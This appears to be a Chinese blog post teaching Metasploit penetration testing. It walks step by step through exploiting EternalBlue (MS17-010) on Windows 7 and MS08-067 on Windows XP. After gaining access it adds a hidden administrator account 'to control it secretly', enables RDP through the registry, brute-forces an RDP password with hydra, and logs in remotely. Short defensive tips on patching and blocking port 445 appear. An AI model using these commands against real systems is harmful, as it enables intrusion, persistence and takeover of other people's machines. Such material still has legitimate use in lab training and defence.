您的位置:首页 > 编程语言 > ASP

metasploit渗透测试

2017-11-08 19:04 405 查看

一些常用指令

msfconsole 打开控制台终端

msfupdate 更新

help [command] e.g. help search 命令使用帮助信息

search […] e.g. search portscan

use … 选择渗透攻击模块

show payloads 查看与该攻击模块相兼容的攻击载荷

set payload … 设置攻击载荷

set target 设置目标

show options 查看需要设置的配置参数

exploit 实施渗透攻击

metasploit渗透攻击模块在目录/usr/share/metasploit-framework/modules/exploits

nmap <扫描选项><扫描目标>

攻击实例

1、利用永恒之蓝(ms17_010)漏洞攻击win7

打开metasploit

msfconsole

使用永恒之蓝模块

search ms17-01

use exploit/windows/smb/ms17_010_eternalblue

填充各种指令,主要是靶机IP,其中445端口已经默认了,其他不用改

show options

set RHOST 192.168.12.1

攻击

exploit或者run

创建新用户,偷偷的控制使用

net user admin 123456 /add

提权,将新创建的用户admin提到管理员权限

net localgroup administrators admin /add

查看权限:

net user admin

防御办法:

1,网上下载补丁,

2,关闭445端口,dos命令:

netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block

netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445

检测445端口是否开启:

netstat -ano -p tcp | find “445”

2、利用Windows Server服务RPC请求缓冲区溢出漏洞(ms_08067)入侵WinXP

在msfconsole使用search命令搜索MS08067漏洞攻击程序

使用use命令调用MS08067漏洞攻击程序

use exploit/windows/smb/ms08_067_netapi

使用show options 命令查看需要设置的选项

可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)

使用 set 命令设置 Module Options,此处需要设置目标IP

接着设置Exploit target,使用show targets 查看可选项

可以看出哪些版本的系统存在此漏洞,攻击的XP系统为WinXP SP3 简体中文版,即使用set target 命令设置目标,此处即为set target 34

此时再用show options 可以看到全部设置完成,接着使用exploit 或者 run 进行攻击,执行exploit命令后得到一个meterpreter

在meterpreter中输入shell即可进入CMD窗口

可以进行一些攻击,如远程桌面控制:

—-打开RDP服务

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

—-使用netstat -an命令查看端口是否开放

—-接着使用net user命令查看XP系统中的用户

net user

—-然后针对指定用户比如sysorem用户进行登录密码爆破

hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt

—-使用hydra爆破密码得:12345接着就能直接登录XP进行远程控制

rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389

—-完成远程控制

8b22
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: